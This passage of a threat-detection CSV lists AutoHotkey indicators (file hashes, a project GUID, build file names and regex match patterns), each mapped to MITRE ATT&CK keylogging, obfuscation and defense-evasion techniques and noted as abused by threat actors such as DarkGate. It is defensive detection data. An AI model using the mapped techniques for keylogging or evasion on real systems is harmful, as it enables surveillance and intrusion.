TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*62613da1a6ac28989c8b3a7076bb90af9c9361cacd76c695c381140c1d9182db*",".{0,1000}62613da1a6ac28989c8b3a7076bb90af9c9361cacd76c695c381140c1d9182db.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for 
Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*62734d219f14a942986e62d6c0fef0c2315bc84acd963430aed788c36e67e1ff*",".{0,1000}62734d219f14a942986e62d6c0fef0c2315bc84acd963430aed788c36e67e1ff.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*69b21d5a3d2bcc2b2b075d275a38f551997c45f28c9504995ede406aa101bead*",".{0,1000}69b21d5a3d2bcc2b2b075d275a38f551997c45f28c9504995ede406aa101bead.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*6f3663f7cdd25063c8c8728f5d9b07813ced8780522fd1f124ba539e2854215f*",".{0,1000}6f3663f7cdd25063c8c8728f5d9b07813ced8780522fd1f124ba539e2854215f.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*6fe778623ef31eb224b4aeff3eaa73aef6d76c091fcb328782046e1ec44969d5*",".{0,1000}6fe778623ef31eb224b4aeff3eaa73aef6d76c091fcb328782046e1ec44969d5.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for 
Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*700d65fb0b7653666b1ba1b3911f97ec9a6c6af647083dafd8609ffcf5499b4b*",".{0,1000}700d65fb0b7653666b1ba1b3911f97ec9a6c6af647083dafd8609ffcf5499b4b.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*704cd5aaaf2ad78e31ce1b7e13ff87c7b5e97bc5e2ef55188525eb7c96a53232*",".{0,1000}704cd5aaaf2ad78e31ce1b7e13ff87c7b5e97bc5e2ef55188525eb7c96a53232.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*7237594482ea47498b240d39ca8e94e3c635dc66fb4989db47739a8a420e6fc2*",".{0,1000}7237594482ea47498b240d39ca8e94e3c635dc66fb4989db47739a8a420e6fc2.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*7350f50c3fc022d217821e6f416497820e6216a714c5ee859af1f36be9b740d7*",".{0,1000}7350f50c3fc022d217821e6f416497820e6216a714c5ee859af1f36be9b740d7.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for 
Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*76EFDEE3-81CF-4ADA-94DC-EA5509FF6FFC*",".{0,1000}76EFDEE3\-81CF\-4ADA\-94DC\-EA5509FF6FFC.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#GUIDproject","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*79d6da35083dc0008ed1da0396c561994822b84bc679d7d6193cd70b1ddce0ef*",".{0,1000}79d6da35083dc0008ed1da0396c561994822b84bc679d7d6193cd70b1ddce0ef.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*7a0dfa37846ead5afe73e4a8525eb1738d3b52c608291ba37088b0c037abde58*",".{0,1000}7a0dfa37846ead5afe73e4a8525eb1738d3b52c608291ba37088b0c037abde58.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" 
"*7b71b013061e80d7fa52560b061e142f9d7abf38d847da9d6871a90f8cbdc293*",".{0,1000}7b71b013061e80d7fa52560b061e142f9d7abf38d847da9d6871a90f8cbdc293.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*7e570c5aa02fb16d74433033fdcdd74f890d8eac26b9b94d24f600c9e48feacc*",".{0,1000}7e570c5aa02fb16d74433033fdcdd74f890d8eac26b9b94d24f600c9e48feacc.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*876dc6fecb7587bc98ed1702f11e01f19f7c56cd9703c76b7722e914e143280c*",".{0,1000}876dc6fecb7587bc98ed1702f11e01f19f7c56cd9703c76b7722e914e143280c.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*88c5d386c60a15d9758570e8b261f6b1d23248bd37d32b98cdf83ebc5223a266*",".{0,1000}88c5d386c60a15d9758570e8b261f6b1d23248bd37d32b98cdf83ebc5223a266.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" 
"*8dc4871ac544d2cd0ff7ccd84b8862eaf9ba0af18bd5b71e29146b17e4b13783*",".{0,1000}8dc4871ac544d2cd0ff7ccd84b8862eaf9ba0af18bd5b71e29146b17e4b13783.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*8e596f227367e273468b5833ab4169b6994bbfc5c1a2a3b85796a769f9444836*",".{0,1000}8e596f227367e273468b5833ab4169b6994bbfc5c1a2a3b85796a769f9444836.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*8e61b9221dd7aeab8c362c7d580eec35e192317bb8c645909e0ce95b91c1332a*",".{0,1000}8e61b9221dd7aeab8c362c7d580eec35e192317bb8c645909e0ce95b91c1332a.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*8f0ddf90f4cc44499bbeb0f2d3ff298cd5e5d206ca759535495ee767e83b6023*",".{0,1000}8f0ddf90f4cc44499bbeb0f2d3ff298cd5e5d206ca759535495ee767e83b6023.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" 
"*8f28c38a0b2af6ac96c4a7e1a2c0f296b2410f845d9aca8487843a1edac4271d*",".{0,1000}8f28c38a0b2af6ac96c4a7e1a2c0f296b2410f845d9aca8487843a1edac4271d.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*9195ca93854a739d434ec0ce62ef7b6fa159402624cd49b41a5ad1f3ad8f138b*",".{0,1000}9195ca93854a739d434ec0ce62ef7b6fa159402624cd49b41a5ad1f3ad8f138b.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*95142d0b33c50fe5fcdd5d9d1a1ec7951bf662b06f09d83438410cba625aa411*",".{0,1000}95142d0b33c50fe5fcdd5d9d1a1ec7951bf662b06f09d83438410cba625aa411.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*96af0b4438274122ca3a69e9556e91c3d2f05af16e74890dee567eebe3ac101a*",".{0,1000}96af0b4438274122ca3a69e9556e91c3d2f05af16e74890dee567eebe3ac101a.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" 
"*975722db63d783f39f712552dbed318d5e4e7e4a68c5822ad44edf79ba0afd5b*",".{0,1000}975722db63d783f39f712552dbed318d5e4e7e4a68c5822ad44edf79ba0afd5b.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*9871de1742c1132c9b3171c4ae970e66b6ebe3a6cf31c35db881a32e33cc4016*",".{0,1000}9871de1742c1132c9b3171c4ae970e66b6ebe3a6cf31c35db881a32e33cc4016.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*98ba5fe44ef68256a7e5692d45f2ad434b64eece32859ce3723803f36a6e4d55*",".{0,1000}98ba5fe44ef68256a7e5692d45f2ad434b64eece32859ce3723803f36a6e4d55.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*99eb1eb28b32a783c6619409988dc8fc70ecc9d1ebc05f286ec4c503d4853cbf*",".{0,1000}99eb1eb28b32a783c6619409988dc8fc70ecc9d1ebc05f286ec4c503d4853cbf.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" 
"*99ed8964fc153ac4984eb94f82bd51b2eda463d6483bb3e7e97d6d2b69b71196*",".{0,1000}99ed8964fc153ac4984eb94f82bd51b2eda463d6483bb3e7e97d6d2b69b71196.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*9b8c27cbcbae9c1ec6fe4265c15a9122806b0b0bf9d1173c499d7d2ccb714e17*",".{0,1000}9b8c27cbcbae9c1ec6fe4265c15a9122806b0b0bf9d1173c499d7d2ccb714e17.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*9c8b1aecaf1bdded80bec98ec5ab5b9b9754cbce9439dd9eacc7d1774d1438f8*",".{0,1000}9c8b1aecaf1bdded80bec98ec5ab5b9b9754cbce9439dd9eacc7d1774d1438f8.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*9f229bb988451fb20a2a307f6d6e598822a8e9bfa69dcf4b31fd67a7f7f4d3ad*",".{0,1000}9f229bb988451fb20a2a307f6d6e598822a8e9bfa69dcf4b31fd67a7f7f4d3ad.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","abused by multiple threat actors 
https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*9f829612db928e5c7e7b08a9bf596b908d09c4f242b7454802e87dd2c2dc3f89*",".{0,1000}9f829612db928e5c7e7b08a9bf596b908d09c4f242b7454802e87dd2c2dc3f89.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*a1c31dc6e3e65461a52bb7f161f8c48e807ccd91d34f3382574d66314eac538d*",".{0,1000}a1c31dc6e3e65461a52bb7f161f8c48e807ccd91d34f3382574d66314eac538d.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*a32362b2769cb3cd8caa10722c50208b7170fe82d3663e85425df416422b4d22*",".{0,1000}a32362b2769cb3cd8caa10722c50208b7170fe82d3663e85425df416422b4d22.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*a6e07cccc0d66a5894500a057fe92440f1e372bda4856f148244ba369bf521de*",".{0,1000}a6e07cccc0d66a5894500a057fe92440f1e372bda4856f148244ba369bf521de.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - 
TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*a7db865b054314d253293a1f427d3a155da5164060804aac431020e26a40e1ad*",".{0,1000}a7db865b054314d253293a1f427d3a155da5164060804aac431020e26a40e1ad.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*af7b8e60b4b54f5f85e6b207ac51926cb076aa4319b8e4c72e59b98c85818cae*",".{0,1000}af7b8e60b4b54f5f85e6b207ac51926cb076aa4319b8e4c72e59b98c85818cae.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*AutoHotkey/AutoHotkey*",".{0,1000}AutoHotkey\/AutoHotkey.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*AutoHotkeySC.bin*",".{0,1000}AutoHotkeySC\.bin.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*AutoHotkeyx.sln*",".{0,1000}AutoHotkeyx\.sln.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*AutoHotkeyx.vcxproj*",".{0,1000}AutoHotkeyx\.vcxproj.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*b04b1dc45652c59f82cecc30cf9aea76e5a1bd6cc3fecc450cef67cbcd825f06*",".{0,1000}b04b1dc45652c59f82cecc30cf9aea76e5a1bd6cc3fecc450cef67cbcd825f06.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" 
"*b0943f704ffc3830b8b900408b94e7a27434602dd34e9a831f81730bee4631a2*",".{0,1000}b0943f704ffc3830b8b900408b94e7a27434602dd34e9a831f81730bee4631a2.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*b5a13819d673e09534661f3f1c2f85f4cac71f020b8a6a64586ba829e2cd3fd4*",".{0,1000}b5a13819d673e09534661f3f1c2f85f4cac71f020b8a6a64586ba829e2cd3fd4.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*b75fa5157fd2ff049b07259fde91ab3605f737827fb64fcbc373e2bd1779bb5d*",".{0,1000}b75fa5157fd2ff049b07259fde91ab3605f737827fb64fcbc373e2bd1779bb5d.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*c:\debug_clipboard_formats.txt*",".{0,1000}c\:\\debug_clipboard_formats\.txt.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives 
expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*c36dd14fc322e1846a793797b758f5b0fb554f7f058da6a333c86f27cbf9ec01*",".{0,1000}c36dd14fc322e1846a793797b758f5b0fb554f7f058da6a333c86f27cbf9ec01.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*c584ab8fbfa1702c36bab98e6e07b05585402ec00c2e44c245a9bd879ca049f0*",".{0,1000}c584ab8fbfa1702c36bab98e6e07b05585402ec00c2e44c245a9bd879ca049f0.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*d67778ebd40bff99e1f248b1612d64f70191632b64af60ea53403d2550f2d640*",".{0,1000}d67778ebd40bff99e1f248b1612d64f70191632b64af60ea53403d2550f2d640.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*d71ba928d2755294ac049a66949606ee82e0e0a7bbb87760ae9fd1bcf24c0b8c*",".{0,1000}d71ba928d2755294ac049a66949606ee82e0e0a7bbb87760ae9fd1bcf24c0b8c.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*d7646ca3a26760fe5633288d79d7b6a44cfc19a85c5315f94e0861963f1c601e*",".{0,1000}d7646ca3a26760fe5633288d79d7b6a44cfc19a85c5315f94e0861963f1c601e.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*dbf3490648efe876bd9a98d53e4d9110bf5e02a3914c0dd4b2a48db4a09799b5*",".{0,1000}dbf3490648efe876bd9a98d53e4d9110bf5e02a3914c0dd4b2a48db4a09799b5.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*dffda71c77c271cafc2f77aa007daea58f32a3562da3a3b924701117c058a336*",".{0,1000}dffda71c77c271cafc2f77aa007daea58f32a3562da3a3b924701117c058a336.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - 